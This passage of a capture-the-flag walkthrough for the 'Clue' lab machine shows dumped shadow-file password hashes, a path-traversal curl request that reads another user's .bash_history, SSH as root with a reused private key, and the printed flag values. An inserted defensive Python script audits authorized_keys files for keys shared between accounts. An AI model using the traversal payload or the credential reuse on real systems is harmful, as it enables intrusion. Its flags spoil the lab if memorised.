www-data:*:18555:0:99999:7:::
backup:*:18555:0:99999:7:::
list:*:18555:0:99999:7:::
irc:*:18555:0:99999:7:::
gnats:*:18555:0:99999:7:::
nobody:*:18555:0:99999:7:::
_apt:*:18555:0:99999:7:::
systemd-timesync:*:18555:0:99999:7:::
systemd-network:*:18555:0:99999:7:::
systemd-resolve:*:18555:0:99999:7:::
messagebus:*:18555:0:99999:7:::
sshd:*:18555:0:99999:7:::
systemd-coredump:!!:18555::::::
ntp:*:19209:0:99999:7:::
cassandra:!:19209:0:99999:7:::
cassie:$6$/WeFDwP1CNIN34/z$9woKSLSZhgHw1mX3ou90wnR.i5LHEfeyfHbxu7nYmaZILVrbhHrSeHNGqV0WesuQWGIL7DHEwHKOLK6UX79DI0:19209:0:99999:7:::
freeswitch:!:19209::::::
anthony:$6$01NV0gAhVLOnUHb0$byLv3N95fqVvhut9rbsrYOVzi8QseWfkFl7.VDQ.26a.0IkEVR2TDXoTv/KCMLjUOQZMMpkTUdC3WIyqSWQ.Y1:19209:0:99999:7:::
I could not view the id_rsa of the root user, or the root flag.
Let's view the .bash_history file:
cassie@clue:~$ curl localhost:1337/../../../../../../../../../home/anthony/.bash_history --path-as-is
clear
ls -la
ssh-keygen
cp .ssh/id_rsa.pub .ssh/authorized_keys
sudo cp .ssh/id_rsa.pub /root/.ssh/authorized_keys
exit
This shows that we could have authenticated as root the whole time with the id_rsa we found previously in cassie's home directory.
Let's use it to SSH to the box:
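The history shows the real weakness was key sharing: anthony's public key (comment anthony@clue, as the xxd of the private key showed) was copied into root's authorized_keys, so the id_rsa lying in cassie's home was a root credential. As an added example, not from this walkthrough, here is an audit that fingerprints every entry in a set of authorized_keys files and reports keys trusted by more than one account; the key blobs are constructed stand-ins, not real keys:

```python
import base64
import hashlib
import struct

KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")

def fingerprint(b64_blob):
    """SHA256 fingerprint in the form ssh-keygen -lf prints: sha256 over the
    decoded key blob, base64-encoded with the '=' padding stripped."""
    digest = hashlib.sha256(base64.b64decode(b64_blob)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def parse_authorized_keys(text):
    """Return [(key_type, fingerprint, comment)] for each key line; skips
    blank/comment lines and an optional leading options field such as
    'from="10.0.0.1",no-pty' (options containing spaces are not handled)."""
    keys = []
    for line in text.splitlines():
        fields = line.strip().split()
        if not fields or fields[0].startswith("#"):
            continue
        idx = next((i for i, f in enumerate(fields)
                    if f.startswith(KEY_TYPE_PREFIXES)), None)
        if idx is None or len(fields) < idx + 2:
            continue
        comment = " ".join(fields[idx + 2:])
        keys.append((fields[idx], fingerprint(fields[idx + 1]), comment))
    return keys

def find_shared_keys(files):
    """files maps username -> authorized_keys contents. Returns
    [(fingerprint, users, comments)] for every key trusted by more than one
    account, with root listed first so the privileged case stands out."""
    owners = {}
    for user, text in files.items():
        for _ktype, fp, comment in parse_authorized_keys(text):
            entry = owners.setdefault(fp, {"users": set(), "comments": set()})
            entry["users"].add(user)
            entry["comments"].add(comment)
    shared = []
    for fp, entry in owners.items():
        if len(entry["users"]) > 1:
            users = sorted(entry["users"], key=lambda u: (u != "root", u))
            shared.append((fp, users, sorted(entry["comments"])))
    return shared

def fake_blob(key_type, seed):
    """Constructed stand-in for a public key blob: SSH wire format is a
    length-prefixed type string followed by the key material; here the
    'material' is just a hash of the seed, so this is NOT a usable key."""
    material = hashlib.sha256(seed).digest()
    raw = (struct.pack(">I", len(key_type)) + key_type
           + struct.pack(">I", len(material)) + material)
    return base64.b64encode(raw).decode()

# Constructed authorized_keys contents mirroring what .bash_history revealed:
# anthony generated a key, trusted it for himself, then copied it into root's.
ANTHONY_LINE = "ssh-rsa " + fake_blob(b"ssh-rsa", b"anthony") + " anthony@clue"
CASSIE_LINE = "ssh-ed25519 " + fake_blob(b"ssh-ed25519", b"cassie") + " cassie@clue"
SAMPLE_FILES = {
    "anthony": ANTHONY_LINE + "\n",
    "root": "# copied by anthony\n" + ANTHONY_LINE + "\n",
    "cassie": 'from="127.0.0.1" ' + CASSIE_LINE + "\n",
}

if __name__ == "__main__":
    for fp, users, comments in find_shared_keys(SAMPLE_FILES):
        print(f"{fp} trusted by {', '.join(users)} ({', '.join(comments)})")
```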
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
<snipped>
-----END OPENSSH PRIVATE KEY-----
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ chmod 600 id_rsa
┌──(kali㉿kali)-[~/…/Machines/OffsecPG/Practice/Clue]
└─$ ssh root@clue.pg -i id_rsa
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
Linux clue 4.19.0-21-amd64 #1 SMP Debian 4.19.249-2 (2022-06-30) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Nov 9 13:48:17 2025 from 192.168.45.187
root@clue:~#
Get the flags:
root@clue:~# cat proof_youtriedharder.txt
87a508096775a773136abfc29f3608a8
root@clue:~# find / -name local.txt -exec cat {} \;
c20f25c19ac3b83861c2457cdc569449